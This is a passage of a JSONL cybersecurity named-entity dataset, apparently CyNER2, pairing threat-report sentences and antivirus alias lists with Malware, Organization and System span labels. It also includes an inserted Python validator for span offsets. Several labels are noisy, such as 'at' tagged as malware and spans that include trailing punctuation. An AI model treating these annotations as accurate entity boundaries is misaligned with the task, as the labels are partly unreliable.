"info": {"id": "cyner2_valid_001192", "source": "cyner2_valid"}} {"text": "We named this campaign “ Bouncing Golf ” based on the malware ’ s code in the package named “ golf. ” The malware involved , which Trend Micro detects as AndroidOS_GolfSpy.HRX , is notable for its wide range of cyberespionage capabilities .", "spans": {"Malware: Bouncing Golf": [[25, 38]], "Organization: Trend Micro": [[131, 142]], "Malware: AndroidOS_GolfSpy.HRX": [[154, 175]]}, "info": {"id": "cyner2_valid_001193", "source": "cyner2_valid"}} {"text": "This RAT is marketed as an undetectable Java RAT.", "spans": {"Malware: RAT": [[5, 8]], "System: Java": [[40, 44]], "Malware: RAT.": [[45, 49]]}, "info": {"id": "cyner2_valid_001194", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Win32.Trojan.WisdomEyes.16070401.9500.9970 Trojan-Ransom.Win32.HmBlocker.bdg Trojan.Win32.Winlock.bsinq TrojWare.Win32.Trojan.Ransom.~H Trojan.MulDrop.65298 BehavesLike.Win32.SoftPulse.qc Trojan/HmBlocker.wf TrojanDropper:Win32/Wlock.A Trojan-Ransom.Win32.HmBlocker.bdg Hoax.HmBlocker Trojan-Ransom.Win32.HmBlocker", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001195", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.DownloadSuleeLnr.Trojan Trojan/W32.Small.32768.AGT Downldr.Sulee.S235944 Win32.Trojan.WisdomEyes.16070401.9500.9947 Win32/Small.AEC Worm.Win32.Deborm.pgc Trojan.Win32.Dwn.bzwwu Trojan.Win32.Downloader.32768.PG Troj.Downloader.W32.Small.ljQA Win32.Worm.Deborm.Plkj Trojan.DownLoader9.55489 Trojan-Downloader.Win32.Small TR/Dldr.Sulee.B TrojanDownloader:Win32/Sulee.A Worm.Win32.Deborm.pgc Downloader/Win32.Small.R24462 Worm.Deborm Win32/Trojan.Downloader.9f6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001196", "source": "cyner2_valid"}} {"text": "A Mac OS X backdoor also known as: OSX/SabPub.A MAC.OSX.Trojan.Lamadai.B Backdoor.MacOSX.SabPab.A MAC.OSX.Trojan.Lamadai.B 
Backdoor.SabPub.OSX.2 OSX.Sabpab OSX_SABPAB.A Win.Trojan.SubPub-1 MAC.OSX.Trojan.Lamadai.B Backdoor.OSX.SabPub.a MAC.OSX.Trojan.Lamadai.B Trojan.Mac.Sabpub.pxvaq OSX.S.Sabpab.42556 MAC.OSX.Trojan.Lamadai.B Backdoor:OSX/Sabpab.A BackDoor.Sabpub.1 OSX_SABPAB.A OSX/FlashFake.g Backdoor/OSXSabPub.a OSX/SabPab.A MAC.OSX.Trojan.Lamadai.B Backdoor.OSX.SabPub.a!c Backdoor.OSX.SabPub.a Backdoor:MacOS_X/SabPab.A OSX32-Trojan/Sabpub.B OSX/FlashFake.g Win32.Backdoor.Sabpub.ynw Backdoor.OSX.SabPub OSX/SabPub.A!tr.bdr Win32/Backdoor.3ab", "spans": {"Malware: backdoor": [[11, 19]]}, "info": {"id": "cyner2_valid_001197", "source": "cyner2_valid"}} {"text": "FF-RAT is a family of malware used in a number of targeted attacks over at least the last five years.", "spans": {"Malware: FF-RAT": [[0, 6]], "Malware: family of malware": [[12, 29]]}, "info": {"id": "cyner2_valid_001198", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.DarkKomet Win32.Trojan.WisdomEyes.16070401.9500.9968 W32/Trojan.KWPG-7705 Backdoor.Win32.DarkKomet.hukx Trojan.Win32.Inject.dchfem Backdoor.W32.Darkkomet!c Win32.Backdoor.Darkkomet.Lmay Trojan.DownLoader7.8295 BehavesLike.Win32.Trojan.vc Trojan/Windef.ey Trojan[Backdoor]/Win32.DarkKomet Backdoor.Win32.DarkKomet.hukx Trojan:MSIL/Dobrun.A Trojan.MSIL.Injector MSIL/Injector.TEX!tr Trj/CI.A Win32/Trojan.fac", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001200", "source": "cyner2_valid"}} {"text": "Proofpoint researchers recently observed a novel targeted phishing attack that combined Outlook Web Access OWA credential phishing with a malicious document download.", "spans": {"Organization: Proofpoint researchers": [[0, 22]], "System: Outlook Web Access OWA": [[88, 110]]}, "info": {"id": "cyner2_valid_001201", "source": "cyner2_valid"}} {"text": "In this case , FrozenCell has primarily netted the actors behind it with recorded outbound calls followed closely by images and recorded incoming calls .", "spans": 
{"Malware: FrozenCell": [[15, 25]]}, "info": {"id": "cyner2_valid_001202", "source": "cyner2_valid"}} {"text": "The malware code is complicated, busy, and fairly obfuscated–there are no Windows API calls or obvious strings.", "spans": {"Malware: malware code": [[4, 16]], "System: Windows API calls": [[74, 91]]}, "info": {"id": "cyner2_valid_001203", "source": "cyner2_valid"}} {"text": "The customer has given us approval to share some of the details about the Spyware app that Skycure discovered.", "spans": {"Organization: customer": [[4, 12]], "Malware: Spyware app": [[74, 85]], "Organization: Skycure": [[91, 98]]}, "info": {"id": "cyner2_valid_001204", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.RingZero RingZero.Trojan Win.Trojan.Ring0-1 Trojan.RingZero Trojan-PSW.Win32.Ring0.e Trojan.RingZero Trojan.Win9x.Ring0.hvgs Troj.Psw.W32!c Win32.Trojan-qqpass.Qqrob.Lqyo Trojan.RingZero Trojan.RingZero Trojan.Eps.165 Trojan/PSW.Ring0.b TR/PSW.Ring0 Trojan.RingZero Trojan-PSW.Win32.Ring0.e PWS:Win32/Ring0.B Win-Trojan/RingZero.5704 Trojan.RingZero Trojan-Spy.Ring0 Win32/Trojan.PSW.03d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001205", "source": "cyner2_valid"}} {"text": "While the counterfeit games claim to provide similar functionality to the popular apps , they are simply used to display ads through a custom advertisement SDK .", "spans": {}, "info": {"id": "cyner2_valid_001206", "source": "cyner2_valid"}} {"text": "This Pulse includes indicators extended from Alienvault Labs Intelligence", "spans": {"Organization: Pulse": [[5, 10]], "Organization: Alienvault Labs Intelligence": [[45, 73]]}, "info": {"id": "cyner2_valid_001207", "source": "cyner2_valid"}} {"text": "The malware copies itself onto removable drives to infect other machines.", "spans": {"Malware: malware": [[4, 11]], "System: removable drives": [[31, 47]], "System: machines.": [[64, 73]]}, "info": {"id": "cyner2_valid_001208", "source": 
"cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Script Trojan.Win64.Click3.ewpadq Trojan.Click3.23647 Trojan.Atros5 W64/Trojan.CDCY-4984 Trojan.BetKrypt.c TrojanDownloader:PowerShell/Plasti.A Trj/CI.A Win32/Trojan.Downloader.036", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001209", "source": "cyner2_valid"}} {"text": "XLoader Disguises as Android Apps , Has FakeSpy Links This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices .", "spans": {"Malware: XLoader": [[0, 7], [63, 70]], "System: Android": [[21, 28], [107, 114]], "Malware: FakeSpy": [[40, 47]], "System: iOS": [[146, 149]], "System: iPhone": [[168, 174]], "System: iPad": [[179, 183]]}, "info": {"id": "cyner2_valid_001210", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Bladabindi.G3 Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_BLADABI.SMC MSIL.Trojan-Spy.Keylogger.I Backdoor.MSIL.Bladabindi.FQ Worm.Bladabindi.Win32.9249 BKDR_BLADABI.SMC Trojan-Dropper.Win32.Injector Backdoor:MSIL/Aataki.A Msil.Worm.Bladabindi.Pgcz Trojan.Krypt!krAm56VQrho MSIL/SpyPSW.AVQ!tr Win32/Trojan.e11", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001212", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Heur.FU.EC2AF0 Win32.Trojan.WisdomEyes.16070401.9500.9966 Backdoor.Trojan Win.Worm.FlyStudio-20 Trojan-Clicker.Win32.Flyst.ko Trojan.Win32.FlySky.cvcco Worm.Win32.Flystudio.18944 TrojWare.Win32.FlyStudio.~UJ Trojan.FlySky.13 TrojanClicker.Flyst.dm TrojanClicker:Win32/Yumud.A Trojan-Clicker.Win32.Flyst.ko Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001213", "source": "cyner2_valid"}} {"text": "Finally, some of the recent CloudDuke spear-phishing campaigns have born a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.", "spans": {"Malware: CloudDuke": [[28, 37]], "Malware: 
CozyDuke": [[99, 107]]}, "info": {"id": "cyner2_valid_001214", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.MSIL Trojan-Ransom.Win32.Blocker.ick Trojan.Win32.Blocker.bgboef Trojan.KillProc.19469 BehavesLike.Win32.Trojan.cc TR/Zusy.23029.3 Trojan:Win32/Kurei.A Trojan/Win32.Blocker Win32.Trojan.Blocker.dkfj Trojan-Ransom.MSIL W32/Blocker.ICK!tr LockScreen.AN", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001215", "source": "cyner2_valid"}} {"text": "The Hellsing APT group is currently active in the APAC region, hitting targets mainly in the South China Sea area, with a focus on Malaysia, the Philippines and Indonesia.", "spans": {}, "info": {"id": "cyner2_valid_001216", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Remokil Riskware.Win32.Killer.cysdud Trojan.Win32.Z.Remokil.69632 Tool.Killer BehavesLike.Win32.Dropper.km BDS/Remokil.A.2 Backdoor:Win32/Remokil.A Trj/CI.A Backdoor.Remokil!tnG0oKXIw5k W32/BackDoor.1YP!tr Win32/Backdoor.709", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001217", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Bdaejec.A.mue Win32.Trojan.KillAV.c Backdoor.Trojan Win32/Downloader.QRedDl_i Backdoor.Win32.Ciadoor.dgu Trojan.Win32.Ciadoor.dqnhik Trojan.StartPage.56147 BehavesLike.Win32.Dropper.dc Exploit.Win32.ShellCode Trojan[Backdoor]/Win32.Ciadoor Backdoor.Win32.Ciadoor.dgu Backdoor:Win32/Bdaejec.A Trojan/Win32.Yoddos.C209363 Backdoor.Ciadoor Backdoor.Ciadoor!PoWyk0Y7Hyg", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001218", "source": "cyner2_valid"}} {"text": "Karagany is used by a number of groups, so the attribution here is weak.", "spans": {"Malware: Karagany": [[0, 8]]}, "info": {"id": "cyner2_valid_001219", "source": "cyner2_valid"}} {"text": "Threat actors salivate at the thought of an increased volume of credit and debit card transactions flowing through endpoints they have 
compromised with card-stealing malware.", "spans": {"Malware: at": [[23, 25]], "Malware: card-stealing malware.": [[152, 174]]}, "info": {"id": "cyner2_valid_001220", "source": "cyner2_valid"}} {"text": "A backdoor targeting Linux also known as: HEUR:HackTool.Linux.XHide.a Trojan.XHide.exrowv Linux.Hacktool.Prochide.Wkbo Tool.Linux.ProcHide.22 ELF/Trojan.IDGF-0 HackTool.Linux.jt HackTool/Linux.XHide.a Hacktool.Linux.Xhide!c HEUR:HackTool.Linux.XHide.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001221", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Hacktool.Ofstar.A W32/Tool.ZAWB-1617 HackTool.Win32.Ofstar.a Trojan.Hacktool.Ofstar.A Trojan.Win32.Ofstar.dczxtl Trojan.Hacktool.Ofstar.A Trojan.Hacktool.Ofstar.A Trojan.Click.17767 Tool.Ofstar.Win32.2 W32/VirTool.AVK HackTool/Win32.Ofstar Win32.HackTool.Ofstar.a.kcloud HackTool:Win32/Ofstar.A Trojan.Hacktool.Ofstar.A HackTool.Win32.Ofstar.a Trojan.Hacktool.Ofstar.A Trojan.Hacktool.Ofstar.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001222", "source": "cyner2_valid"}} {"text": "The program can redirect incoming calls to the phone numbers of cybercriminals.", "spans": {"Malware: program": [[4, 11]]}, "info": {"id": "cyner2_valid_001223", "source": "cyner2_valid"}} {"text": "Port 6206 : Skype extraction service .", "spans": {"System: Skype": [[12, 17]]}, "info": {"id": "cyner2_valid_001224", "source": "cyner2_valid"}} {"text": "This discovery indicates the actor ’ s ambition in expanding operations into Google Play store with previous success experience from the main “ Agent Smith ” campaign .", "spans": {"System: Google Play": [[77, 88]], "Malware: Agent Smith": [[144, 155]]}, "info": {"id": "cyner2_valid_001225", "source": "cyner2_valid"}} {"text": "The malware reached a global spread, infecting mostly users from south-east Asia, but also over 280,000 users in the US.", "spans": {"Malware: malware": [[4, 11]], "Organization: users": 
[[104, 109]]}, "info": {"id": "cyner2_valid_001227", "source": "cyner2_valid"}} {"text": "Swearing Trojan's name comes from Chinese swear words found inside the malware's code.", "spans": {"Malware: Swearing Trojan's": [[0, 17]], "Malware: the malware's code.": [[67, 86]]}, "info": {"id": "cyner2_valid_001228", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Malware11 Trojan.Obfuscated.MQ Trojan.Obfuscated.MQ Downloader.RtkDL.Win32.588 Trojan.Obfuscated.MQ Win32.Rootkit.Koutodoor.a W32/Downldr2.FEHJ Trojan.Farfli RTKT_KTDOOR.SMIA Trojan.Obfuscated.MQ Trojan.Obfuscated.MQ Trojan.Win32.RtkDL.bfwayn Trojan.Win32.Downloader.29664.B Troj.Downloader.W32.RtkDL.l6Y8 Trojan.Obfuscated.MQ Trojan.Obfuscated.MQ Adware.Baidu.875 RTKT_KTDOOR.SMIA BackDoor-DTL.sys Trojan.Rootkit TrojanDownloader.RtkDL.tx Trojan[Downloader]/Win32.RtkDL Trojan:WinNT/Koutodoor.A Trojan/Win32.Xema.C26785 BackDoor-DTL.sys", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001229", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Concon.A Trojan.Win32.Concon!O Trojan.Concon.A Trojan.Concon.A Trojan.Win32.Hesv.bznw Trojan.Concon.A Heur.Packed.Unknown Trojan.Concon.A Trojan/Win32.Concon Trojan.Concon.A Trojan.Win32.Hesv.bznw Trojan:Win32/Concon.C Trojan.Concon.A Win32.Trojan.Concon.Hwmo Trojan.Concon!EDvZbBUGNm0 Trojan.Concon W32/Dx.VVF!tr Win32/Trojan.ee5", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001230", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.WesboaHAH1.Worm Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Trojan.LCZO-3767 Win.Trojan.Pasmu-203 Trojan.Win32.Pasmu.sdcc Trojan.Win32.Pasmu.58368 TrojWare.Win32.PSW.Delf.~JHN Trojan.PWS.Gootkit.2 BehavesLike.Win32.VTFlooder.qh Trojan.Win32.Pasmu Trojan/Pasmu.bs Win32.PSWTroj.Undef.kcloud Trojan.Heur.FU.EDD95C Trj/CI.A Win32/Trojan.BO.9fe", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001231", "source": 
"cyner2_valid"}} {"text": "The malware exfiltrates the collected account data directly to an external Command and Control C2 Server in Eastern Europe, but unusually the communications utilise raw TCP sockets rather than the HTTP protocol that has become the norm in POS malware.", "spans": {"Malware: malware": [[4, 11]], "Malware: POS malware.": [[239, 251]]}, "info": {"id": "cyner2_valid_001232", "source": "cyner2_valid"}} {"text": "AresLoader is a new loader malware-as-a-service MaaS offered by threat actors with links to Russian hacktivism that was spotted recently in the wild.", "spans": {"Malware: AresLoader": [[0, 10]], "Malware: new loader malware-as-a-service MaaS": [[16, 52]]}, "info": {"id": "cyner2_valid_001233", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Buterat Trojan.Downloader Adware.Liuliangbao.Win32.10 Trojan.Mikey.DF455 not-a-virus:AdWare.Win32.Liuliangbao.by Riskware.Win32.Liuliangbao.erwbnw Trojan.DownLoader25.5364 GrayWare[AdWare]/Win32.Liuliangbao Backdoor:Win32/Buterat.C!bit not-a-virus:AdWare.Win32.Liuliangbao.by PUP/Win32.Liuliangbao.C2086918 AdWare.Liuliangbao PUA.Liuliangbao! 
PUA.Liuliangbao Trj/GdSda.A Win32/Trojan.719", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001234", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Welchia.Worm Net-Worm.Win32.Welchia!O W32.Nachi W32/Nachi.worm.a W32/Nachi.worm.a Win32.Worm.Rbot.a W32/Nachi.A W32.Welchia.Worm Win32/Nachi.A WORM_NACHI.H Win.Worm.Blaster-4 Net-Worm.Win32.Welchia.s Trojan.Win32.Welchia.oxhi Worm.Win32.Welchia.10240.B W32.W.Welchia.l7FB Win32.HLLW.LoveSan.2 Worm.Welchia.Win32.1 WORM_NACHI.H BehavesLike.Win32.Backdoor.mh Net-Worm.Win32.Welchia W32/Nachi.GTED-3671 WORM/Nachi.A.1 Worm[Net]/Win32.Welchia Worm:Win32/Nachi.A Net-Worm.Win32.Welchia.s Net-Worm.Welchia W32/Nachi.M.worm I-Worm.Nachi.A Win32/Nachi.A Worm.Win32.Nachi W32/Nachi.A!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001235", "source": "cyner2_valid"}} {"text": "The attachment in this campaign is a malicious zip file containing malicious obfuscated JavaScript.", "spans": {"Malware: malicious zip file": [[37, 55]], "Malware: malicious obfuscated JavaScript.": [[67, 99]]}, "info": {"id": "cyner2_valid_001237", "source": "cyner2_valid"}} {"text": "This same infection chain has been utilized in the past to infect computers with the Dridex banking Trojan and Jaff's predecessor, Locky ransomware.", "spans": {"System: computers": [[66, 75]], "Malware: Dridex banking Trojan": [[85, 106]], "Malware: Jaff's": [[111, 117]], "Malware: Locky ransomware.": [[131, 148]]}, "info": {"id": "cyner2_valid_001238", "source": "cyner2_valid"}} {"text": "Unit 42 has recently discovered a new variant of PowerWare, also known as PoshCoder, imitating the popular Locky ransomware family.", "spans": {"Organization: Unit 42": [[0, 7]], "Malware: new variant": [[34, 45]], "Malware: PowerWare,": [[49, 59]], "Malware: PoshCoder,": [[74, 84]], "Malware: Locky ransomware family.": [[107, 131]]}, "info": {"id": "cyner2_valid_001239", "source": "cyner2_valid"}} {"text": "In fact, 
our team considers them some of the best adversaries out of all the numerous nation-state, criminal and hacktivist/terrorist groups we encounter on a daily basis.", "spans": {"Organization: team": [[13, 17]]}, "info": {"id": "cyner2_valid_001240", "source": "cyner2_valid"}} {"text": "The URLs — abused as part of XLoader ’ s C & C — are hidden in three webpages , and the C & C server that XLoader connects to differ per region .", "spans": {"Malware: XLoader": [[29, 36], [106, 113]]}, "info": {"id": "cyner2_valid_001241", "source": "cyner2_valid"}} {"text": "Operation Pawn Storm is a campaign known to target military, embassy, and defense contractor personnel from the United States and its allies.", "spans": {"Organization: military, embassy,": [[51, 69]], "Organization: defense contractor personnel": [[74, 102]]}, "info": {"id": "cyner2_valid_001242", "source": "cyner2_valid"}} {"text": "Even though this is not a traditional remote access tool ( RAT ) , this campaign seems to target mainly private users .", "spans": {}, "info": {"id": "cyner2_valid_001243", "source": "cyner2_valid"}} {"text": "These are related to the malware Naoinstalad", "spans": {"Malware: the malware Naoinstalad": [[21, 44]]}, "info": {"id": "cyner2_valid_001244", "source": "cyner2_valid"}} {"text": "During testing we were able to generate a number of proof-of-concept PoC documents both with and without a prompt to the user.", "spans": {}, "info": {"id": "cyner2_valid_001245", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.ThasoticLTAA.Trojan Trojan/Seeav.i Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Dwn.doicqs Win32.Worm.Small.Loif Trojan.DownLoader12.19458 Worm.Seeav.Win32.1 BehavesLike.Win32.Ransomware.fc TR/Crypt.Xpack.123006 Worm/Win32.Small Trojan:Win32/Seeav.B Win32/Seeav.I Worm.Win32.Seeav Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001246", "source": "cyner2_valid"}} {"text": "The attack has affected users browsing 
to many popular sites, including CNN Indonesia, the official website of Prague Airport, Detik, AASTOCKS, RTL Television Croatia, and the Bejewled Blitz game on Facebook.", "spans": {"Organization: CNN": [[72, 75]], "Organization: Detik, AASTOCKS, RTL Television": [[127, 158]], "Organization: the Bejewled Blitz game": [[172, 195]], "Organization: Facebook.": [[199, 208]]}, "info": {"id": "cyner2_valid_001248", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Bitmin.alk BehavesLike.Win32.Trojan.hh Trojan.Win32.Macultum TrojanDownloader.Bitmin.bq Trojan-Downloader.Win32.Bitmin.alk Trojan/Win32.Dropper.C237486 Win32.Trojan-downloader.Bitmin.Eflh W32/Bitmin.ALK!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001249", "source": "cyner2_valid"}} {"text": "After obtaining a sample from this attack and conducting further analysis, we found that the attackers have been using the same payload and just altering its configurations in attacks since March of this year.", "spans": {"Malware: payload": [[128, 135]]}, "info": {"id": "cyner2_valid_001250", "source": "cyner2_valid"}} {"text": "At other times , Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant .", "spans": {"Malware: Bread": [[17, 22]]}, "info": {"id": "cyner2_valid_001252", "source": "cyner2_valid"}} {"text": "New samples of targeted malware primarily seen in the Middle East.", "spans": {"Malware: malware": [[24, 31]]}, "info": {"id": "cyner2_valid_001253", "source": "cyner2_valid"}} {"text": "thought to be associated with targeted malware.", "spans": {"Malware: malware.": [[39, 47]]}, "info": {"id": "cyner2_valid_001255", "source": "cyner2_valid"}} {"text": "The group also continues to focus on theft of code signing certificates and internal documentation, including company files and internal communication history chats/emails.", "spans": {"Organization: The group": [[0, 
9]]}, "info": {"id": "cyner2_valid_001256", "source": "cyner2_valid"}} {"text": "TrendMicro has noticed a recent increase in TorrentLocker-related emails being sent to users in several countries, particularly the United Kingdom and Turkey.", "spans": {"Organization: TrendMicro": [[0, 10]]}, "info": {"id": "cyner2_valid_001257", "source": "cyner2_valid"}} {"text": "We have followed the activities of this botnet for several months and during our investigations we found some versions of a Windows fork of the malware.", "spans": {"Malware: botnet": [[40, 46]], "System: Windows": [[124, 131]], "Malware: malware.": [[144, 152]]}, "info": {"id": "cyner2_valid_001258", "source": "cyner2_valid"}} {"text": "During the past week, US users visiting adult-themed sites were targeted by ads for a fake PornHub app that contained a version of the Koler ransomware.", "spans": {"Organization: US users": [[22, 30]], "Malware: the Koler ransomware.": [[131, 152]]}, "info": {"id": "cyner2_valid_001259", "source": "cyner2_valid"}} {"text": "A possible attack scenario involves replacing legitimate apps with repackaged or malicious versions .", "spans": {}, "info": {"id": "cyner2_valid_001260", "source": "cyner2_valid"}} {"text": "Once it infects a device , Wroba behaves very aggressively .", "spans": {"Malware: Wroba": [[27, 32]]}, "info": {"id": "cyner2_valid_001261", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Vetor.PE Trojan.Win32.Farfli.1!O W32.Virut.G Backdoor.Xyligan BKDR_SMALL.LDI W32.Virut.CF Win32/Virut.17408 Win.Trojan.Xyligan-19 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Backdoor.Win32.Bdx.e Win32.Virut.56 BehavesLike.Win32.Virut.cc Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.cr.61440 Backdoor:Win32/Xyligan.A Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.13 Win32/Virut.NBP Backdoor.Win32.Xyligan W32/Sality.AO Virus.Win32.VirutChangeCall.J", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001262", "source": "cyner2_valid"}} 
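The records above share one layout: each key under "spans" is "Label: surface text" and maps to a list of [start, end) character offsets into "text". Before training or evaluating an entity model on this file, it is worth re-slicing every span and checking what the offsets actually point at. The following validator is an added example written for this page; it is not part of the corpus or of any tooling published with it. It checks three things: that text[start:end] reproduces the surface text in the key, that a span is not a bare function word (the "Malware: at" annotation visible above is exactly this case), and that a span does not swallow trailing sentence punctuation. The first two sample records are the ones shown on this page (ids cyner2_valid_001172 and cyner2_valid_001220); the third is constructed, with a made-up id and an offset deliberately shifted by one character. The stopword list and the punctuation rule are heuristics chosen here, not part of the corpus specification.

```python
import json
from typing import Dict, List

# Sample input in the corpus's own JSONL layout: one JSON object per line, with
# "spans" keyed as "Label: surface text" -> list of [start, end) offsets into "text".
# The first two records are the ones shown on this page; the third is constructed
# (hypothetical id) with an offset deliberately shifted by one character.
SAMPLE_JSONL = "\n".join(json.dumps(rec) for rec in [
    {"text": "It also attempts to spread using the EternalBlue and EternalRomance SMBv1 exploits.",
     "spans": {"Malware: EternalBlue": [[37, 48]],
               "Malware: EternalRomance SMBv1 exploits.": [[53, 83]]},
     "info": {"id": "cyner2_valid_001172", "source": "cyner2_valid"}},
    {"text": "Threat actors salivate at the thought of an increased volume of credit and debit card "
             "transactions flowing through endpoints they have compromised with card-stealing malware.",
     "spans": {"Malware: at": [[23, 25]],
               "Malware: card-stealing malware.": [[152, 174]]},
     "info": {"id": "cyner2_valid_001220", "source": "cyner2_valid"}},
    {"text": "Karagany is used by a number of groups, so the attribution here is weak.",
     "spans": {"Malware: Karagany": [[1, 9]]},
     "info": {"id": "constructed_000001", "source": "constructed"}},
])

# Heuristics chosen for this example: function words that should never be an entity
# on their own, and punctuation that should not end an entity mention.
STOPWORDS = {"a", "an", "and", "at", "for", "in", "of", "on", "the", "to", "with"}
TRAILING_PUNCT = ".,;:"


def parse_records(jsonl_text: str) -> List[dict]:
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def check_record(record: dict) -> List[str]:
    """Return the problems found in one record; an empty list means it passed."""
    text = record["text"]
    problems: List[str] = []
    for key, offsets in record["spans"].items():
        label, sep, surface = key.partition(": ")
        if not sep or not surface:
            problems.append(f"malformed span key {key!r}: expected 'Label: surface'")
            continue
        for start, end in offsets:
            actual = text[start:end]
            if actual != surface:
                # The offsets are what a model is trained on; a key whose surface text
                # does not match them is the most damaging defect, so report and move on.
                problems.append(f"misaligned {label} span [{start},{end}]: "
                                f"key says {surface!r}, text has {actual!r}")
                continue
            if surface.lower() in STOPWORDS:
                problems.append(f"stopword tagged as {label}: {surface!r} at [{start},{end}]")
            if surface[-1] in TRAILING_PUNCT:
                problems.append(f"trailing punctuation inside {label} span: {surface!r}")
    return problems


def audit(jsonl_text: str) -> Dict[str, List[str]]:
    """Map each record id to its list of problems."""
    return {rec["info"]["id"]: check_record(rec) for rec in parse_records(jsonl_text)}


if __name__ == "__main__":
    for rec_id, problems in audit(SAMPLE_JSONL).items():
        print(rec_id, "OK" if not problems else "")
        for problem in problems:
            print("   ", problem)
```

To run it over the whole file, pass the file contents to audit(). Misaligned spans should be treated as blocking, since they silently shift the training target; the stopword and punctuation findings are review queues, because entity-level precision and recall computed against such spans will not mean what you expect.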
{"text": "In Russia , some major banks offer their clients a special service that allows them to transfer money from their bank card to their mobile phone account .", "spans": {}, "info": {"id": "cyner2_valid_001263", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojanDownloader.Tearsp.AA2 Downloader.Small.Win32.37323 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.A.Downloader.15980 TrojWare.Win32.TrojanDownloader.Small.F BehavesLike.Win32.Fareit.mt Trojan[Downloader]/Win32.Small Downloader/Win32.Small.R5459 Bck/Unilink.B Trojan.Win32.StartPage.c Trojan.Sisron!oYYxWSE+/gw", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001264", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Kryptik.Win32.764268 Trojan/Kryptik.fy Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.PassView.dhxqtk Tool.PassView.638 Trojan-Dropper.Win32.Injector TrojanDropper.Injector.alvo TR/Keylogger.AY Trojan[Dropper]/Win32.Injector Win32.HeurC.KVM007.a.kcloud Trojan/Win32.Spnr.R38927 Trojan.Kryptik!I/Y93lnQFpU", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001265", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.QearadG.Trojan Trojan.Mauvaise.SL1 Trojan.Graftor.D451F3 Win32.Trojan.WisdomEyes.16070401.9500.9986 TROJ_SACTO.C Trojan.Win32.FakeFolder.bk Trojan.DownLoader21.61435 Trojan.FakeFolder.Win32.217 TROJ_SACTO.C Trojan.Win32.Urelas W32/Trojan.EMXX-4272 Trojan.FakeFolder.a Trojan:Win32/Sacto.B!bit Trojan.Win32.FakeFolder.bk HEUR/Fakon.mwf Trojan.FakeFolder Win32.Trojan.Fakefolder.Pcsn Trojan.Sacto!tCZ0BN8/xSI", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001266", "source": "cyner2_valid"}} {"text": "From there , root-level apps can read or modify data and resources that would be off-limits to normal apps .", "spans": {}, "info": {"id": "cyner2_valid_001267", "source": "cyner2_valid"}} {"text": "A backdoor also known as: 
